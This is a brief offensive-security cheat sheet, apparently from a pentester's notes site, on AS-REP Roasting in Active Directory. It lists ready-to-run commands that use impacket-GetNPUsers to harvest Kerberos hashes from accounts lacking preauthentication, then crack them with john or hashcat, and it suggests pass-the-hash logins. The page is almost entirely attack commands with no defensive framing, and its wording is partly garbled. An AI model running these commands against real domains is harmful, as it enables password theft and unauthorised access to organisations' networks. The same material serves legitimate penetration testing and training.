AS-REP Roasting

Last modified: 2022-12-30

Active Directory Windows

AS-REP Roasting is a technique that retrieves password hashes that are not required Kerberos preauth in Active Directory.

Enumeration

Lists users and passwords is not required Kerberos pre auth. Used for ASREPRoasting.

# Find a password hashes of given users
impacket-GetNPUsers -dc-ip <target-ip> example.local/ -no-pass -usersfile users.txt

# Find a password hash of given user
impacket-GetNPUsers -dc-ip <target-ip> example.local/<username> -no-pass -format hashcat 

If we find a password hash, crack it.

john --format=krb5asrep --wordlist=wordlist.txt hash.txt
# or
hashcat -m 18200 -a 0  hash.txt wordlist.txt

If we find a password hash, crack it or use it to login with pass the hash.